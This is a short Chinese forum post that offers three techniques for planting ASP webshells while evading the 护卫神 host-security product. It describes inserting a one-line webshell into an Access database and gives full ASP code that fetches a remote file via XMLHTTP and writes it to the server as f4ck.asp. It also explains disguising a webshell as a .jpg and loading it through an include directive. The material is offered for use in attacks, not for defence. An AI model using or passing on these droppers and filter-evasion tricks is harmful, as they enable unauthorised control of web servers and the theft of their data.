本帖最后由 bjbsr 于 2015-1-11 15:45 编辑
方法1:插入一句话到数据库
也是一个eweb编辑器,之后他说要不给access的数据库里面插入一句话,这样的话不知道杀不杀?
我们就去试验了,事实证明我们成功了。
这个方法最后也在t00ls公布过了,最新版本的护卫神已经拦截了数据库马儿。
方法2:远程下载
或者也可以传个远程下载的马儿,这个方法以前用过,不知道现在还可以用不。
远程下载代码:
[AppleScript] 纯文本查看 复制代码 <%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.baidu.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("f4ck.asp"),2
set sGet = nothing
set sPOST = nothing
%>
方法3:本地包含
将一句话保存为dute365.jpg,假设上传后地址为.../dute365.jpg,那么再上传一个dute365.asp内容为<!–#include file="../dute365.jpg"-->,这样就是利用了include语句包含了本地的文件。 | 
发表于 2015-1-11 15:44:27
